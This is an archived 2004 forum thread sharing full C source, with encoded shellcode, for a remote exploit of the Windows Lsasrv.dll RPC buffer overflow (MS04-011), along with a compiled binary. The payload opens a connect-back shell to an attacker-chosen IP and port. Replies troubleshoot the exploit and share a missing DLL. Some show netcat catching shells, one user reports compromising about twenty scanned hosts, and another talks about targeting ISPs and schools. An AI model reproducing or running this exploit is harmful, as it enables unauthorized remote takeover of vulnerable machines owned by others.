Compiled Windows Lsasrv.dll Rpc Remote Exploit

Full Version: Compiled Windows Lsasrv.dll Rpc Remote Exploit

GovernmentSecurity.org > The Archives > Public Downloads

Pages: 1, 2, 3, 4

dr0zaxx

Apr 25 2004, 04:19 PM

CODE

#include <windows.h>
#pragma comment(lib,"mpr.lib")
#pragma comment(lib, "ws2_32")

/* from www.cnhonker.com */

unsigned char scode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";

unsigned char scode2[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define LEN 3500

char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2];
char target2[200];

int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret=0;
int i;
char c, *target;
LPSTR hostipc[40];
NETRESOURCE netResource;
unsigned short port;
unsigned long ip;
unsigned char* sc;

if (argc < 3) {
printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \
bug discoveried by eEye,\n \
code by sbaa(sysop@sbaa.3322.org) 2004/04/24 ver 0.1\n \
Usage: \n \
%s 0 targetip (Port ConnectBackIP ) \
----> attack 2k (tested on cn sp4,en sp4)\n \
%s 1 targetip (Port ConnectBackIP ) \
----> attack xp (tested on cn sp1)\n",argv[0],argv[0]);
printf("");
return 0;
}

target = argv[2];
sprintf((char *)hostipc,"\\\\%s\\ipc$",target);

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;

ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
printf("Create NULL session failed\n");
// return 1;
}

hNetapi = LoadLibrary("sbaaNetapi.dll");
if (!hNetapi) {
printf("Can't load sbaaNetapi.dll.\n");
exit(0);
}

(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");

if (!DsRoleUpgradeDownlevelServer) {
printf("Can't find function.\n");
exit(0);
}

memset(buf, '\x90', LEN);

if(argc>4)
{

port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;

memcpy(&scode[118], &port, 2);
memcpy(&scode[111], &ip, 4);
sc=scode;
}
else
{
if(argc>3)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&scode2[176], &port, 2);

}
sc=scode2;
}
//attack all 2k sp3 version

memcpy(&buf[2020], "\x95\x0c\x01\x78", 4);
memcpy(&buf[2036], sc, strlen(sc));

//attack all 2k sp4 version
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844],"\x2b\x38\x03\x78",4);

memcpy(&buf[2856], sc, strlen(sc));

printf("shellcode size %d\n", strlen(sc));

for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;

if(atoi(argv[1])==1)
{
memcpy(&sendbuf, sc, strlen(sc));
memcpy(sendbuf+1964,"\xad\x14\x48\x74",4);
memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);
memcpy(&sendbuf[1980], "\xeb\xde",2);
}

memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}

memset(buf2, 0, 2);
ret=0;
ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);

printf("Ret value = %d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hNetapi);

return 0;
}

I have attached the compiled exploit with it's source as an attachment in the post. For those who cant compile you can use mine~ No backdoor no shit no nothing.

rush

Apr 25 2004, 04:24 PM

Good post again dr0zaxx, gonna check it out!

Xenos

Apr 25 2004, 04:28 PM

Thanks dude, thanks a lot, I'm gonna test it tomorrow on my test box @ work

Greetz to you

Nostremato

Apr 25 2004, 04:30 PM

lsass 1 ***.***.***.*** <MY PORT> <MY IP>
Can't load sbaaNetapi.dll.

dll missing @my pc or @the remoe pc?

SlashZero

Apr 25 2004, 04:31 PM

Can't load sbaaNetapi.dll

geez i googled for that one... no results :/

brOmstar

Apr 25 2004, 04:33 PM

dr0zaxx can u pleaaaase tellme what c-compiler u used ?

i got some errors when i used win32-lcc

dr0zaxx

Apr 25 2004, 04:35 PM

QUOTE

brOmstar Posted on Apr 25 2004, 04:33 PM
dr0zaxx can u pleaaaase tellme what c-compiler u used ?

i got some errors when i used win32-lcc

I used the standard Microsoft Visual C++ 6 Enterprise Edition

prolific

Apr 25 2004, 04:39 PM

I think it's not

QUOTE

hNetapi = LoadLibrary("sbaaNetapi.dll");

but

QUOTE

hNetapi = LoadLibrary("Netapi.dll");

I think it's a joke from the coder, to see who can REALLY understand the code...

dr0zaxx

Apr 25 2004, 04:42 PM

Sorry for the program error, i checked the code and i change the sbaaNetapi.dll to NetApi32.dll . Changing the NetApi.dll will result in an error too.

Sorry about it

rush

Apr 25 2004, 04:44 PM

ok it gives no shell on vulrenable machine:
lsass 0 192.168.0.108 1111 192.168.0.105
win2k sp4 en!

dr0zaxx

Apr 25 2004, 04:48 PM

Nah, it's not their own library. They changed the stuff. It might be that on the programmer side of the computer they are using that dll filename. But i dont think so, by default the netapi used is netapi32.dll

Bombers

Apr 25 2004, 04:51 PM

i just try it , and my pc got rebot

must be a virus or something..

Alexander01

Apr 25 2004, 04:56 PM

i got the same here

stonebreaker

Apr 25 2004, 04:58 PM

i have test it
it is good

agathos

Apr 25 2004, 05:07 PM

stonebreaker haha

show us a screenshot that was it succesfull
thanks.

Alexander01

Apr 25 2004, 05:08 PM

i think he means his viruscanner don't detect it

x1`

Apr 25 2004, 05:15 PM

also need a null session scanner

thanks alot for this

blackP0ster

Apr 25 2004, 05:28 PM

D:\>lsass 0 192.168.0.143 4444 192.168.0.143
shellcode size 316
Ret value = 1352

doesn't work for me..!

maybe successfully exploited, but i didn't get my shell back

black

x1`

Apr 25 2004, 05:35 PM

try this scanner its ment to scan for the vun

temp

Apr 25 2004, 05:47 PM

it works local, just try to exploit 127.0.0.1

C:\>lsass 0 192.168.0.10 123 192.168.0.1
shellcode size 316

Z:\Security>nc -l -p 123
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

but remote i had no success

Fuas

Apr 25 2004, 05:48 PM

Tried this exploit locally. setup my unix box to listen for the shell back.

ran the code. first time did its job. then got a dialog saying debug or not. but no shell.

ran it a second time. 2nd time prog said the same. but I got a RCP 60sec timer. but alas still no shellcode.

using XP Pro SP 1. guessing that it may work on some os. but not mine. but its close, very close.

thanks for posting the code. hope somebody has other results out there

Gurou

Apr 25 2004, 05:51 PM

works only on CHINESE windows

temp

Apr 25 2004, 05:53 PM

no, worked on my GERMAN win2k SERVER...

to get it working on remote, u have to compile your own netapi lib

The Storm

Apr 25 2004, 05:59 PM

also tried it and got a 60 sec. timer on German XP SP1!

Alexander01

Apr 25 2004, 06:01 PM

lol that's what i mean, just del it, nothing worth

dr0zaxx

Apr 25 2004, 06:03 PM

Why would you want to compile your own netapi.lib? Any reason? I dont see the need to

Fuas

Apr 25 2004, 06:04 PM

I see a patten here

all 2k boxes seem to fall.
but nobodys had a shell on xp.

can ppl also post what os there using and what sp if poss.

brOmstar

Apr 25 2004, 06:04 PM

1-2-3 where is my exploit or what alex1 ?

this is hacking ..and i hope that we can get it to work alltogether the exploit works fine i think but we need to modify the netapi32.dll and this should be very interesting ..so everybody can learn a little bit more about his box =)

dr0zaxx look at exploit discussion i posted something there why we had to build a modified version

h3llraz0r

Apr 25 2004, 06:13 PM

no shell for me remotley. put already patched my system, tested it and no luck.

tried comiling got lots of errors

Gurou

Apr 25 2004, 06:29 PM

http://www.governmentsecurity.org/forum/in...?showtopic=8076

Venom

Apr 25 2004, 06:57 PM

I'm using win Xp sp1 , neither local no remote work for me .. get teh 60 sec timer to shutdown

..

Gives Error Memory Cannot be referenced from some *** address

DigitCrash

Apr 25 2004, 08:05 PM

i
just get
shellcode size 316
RET value = 50
on remote machines

so Long DC

strasharo

Apr 25 2004, 08:06 PM

Here is the missing .dll if someone needs it.

Venom

Apr 25 2004, 09:17 PM

did anyone check uisng the exe from an unpatched machine and then from a patched machine ?

When i tried it on one of my unpatched machines it caused soem service to crash , giving that 60 sec timer window.

but when i tried it from a patched machine it gave .

D:\x\lsass_fixed>lsass.exe 1 11111 192.168.0.103
Create NULL session failed
shellcode size 404
Ret value = 50

Edit: And like someone said you'll need a null session scanner

Shadowslave

Apr 25 2004, 09:28 PM

QUOTE (strasharo @ Apr 25 2004, 08:06 PM)

Here is the missing .dll if someone needs it.

works remote !!! with this dll thanx man !
tried on a win2k ger sp4

XeLoRy

Apr 25 2004, 10:24 PM

exellent job !!!
thk you very much

BuzzDee

Apr 25 2004, 10:57 PM

OH F*CK!

this exploit is dangerous! i did a portscan on port 139, exploitet about 20 ips and had about 20 ncs open listening on port 1333. now i have 20 shellls...

DAMN....

temptation

Apr 25 2004, 10:59 PM

thx for this one ...

i will try

so i have to use the "not fixed" exe + the missing dll?

is that alrite?

Neo-Tokyo

Apr 25 2004, 11:16 PM

So, use the original exe with the new dll in system32? I dont get it, am i slow?

strasharo

Apr 25 2004, 11:47 PM

Yep, i`m glad that i was helpful to you.

seppel18

Apr 25 2004, 11:47 PM

Worx Wonderfull with Win2k

Thx!!

Now we need one for XP

tweakz20

Apr 25 2004, 11:59 PM

can't get a shell here...
nc -l -p 1333
(no responce)

rush

Apr 26 2004, 12:22 AM

its working (on local network)
setup:
lsass 0 target 123 connectbackip
nc -l -p 123

start:
lsass 0 target 123 connectbackip
shellcode size 316

nc -l -p 123
(now press enter)
sheel will come here

btw, first thing in the morning patch youre god damn network! Windows2000-KB835732-x86-ENU.EXE!!!!

tweakz20

Apr 26 2004, 12:46 AM

did anyone get this to work outside local network...?

Killaloop

Apr 26 2004, 12:54 AM

QUOTE (tweakz20 @ Apr 26 2004, 12:46 AM)

did anyone get this to work outside local network...?

yes it works
patch your systems!!

brOmstar

Apr 26 2004, 01:21 AM

boaahh deadly one ..works better then i ever thought

ssj4conejo

Apr 26 2004, 01:27 AM

Works perfectly on a local network on my 2k boxes, which are not updated.. my xbox box is already updated so it didnt work... Only prob with this is finding isps that ARENT blocking port 139... heh, trying to find some right now, or maybe schools, etc.

tweakz20

Apr 26 2004, 01:39 AM

there was a scan for this put out earlier in the convo (pretty sure it was this topic anyway)

aw, yes
http://www.governmentsecurity.org/forum/in...opic=8069&st=15 (that page)

WeeDMoNKeY

Apr 26 2004, 02:06 AM

rofl way to link it to the same thread

been messing with this, no results yet.. but well see :> port 139 has been murdered :/

tweakz20

Apr 26 2004, 02:14 AM

QUOTE (ssj4conejo @ Apr 26 2004, 01:27 AM)

... Only prob with this is finding isps that ARENT blocking port 139... heh, trying to find some right now, or maybe schools, etc.

forgot to mention... isps aren't the people that control your ports, it's the administrator (of the local network/stand alone system) to watch out for the ports... and schools.... not a very smart place to hit... most schools don't allow access to netbios externally anyway

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.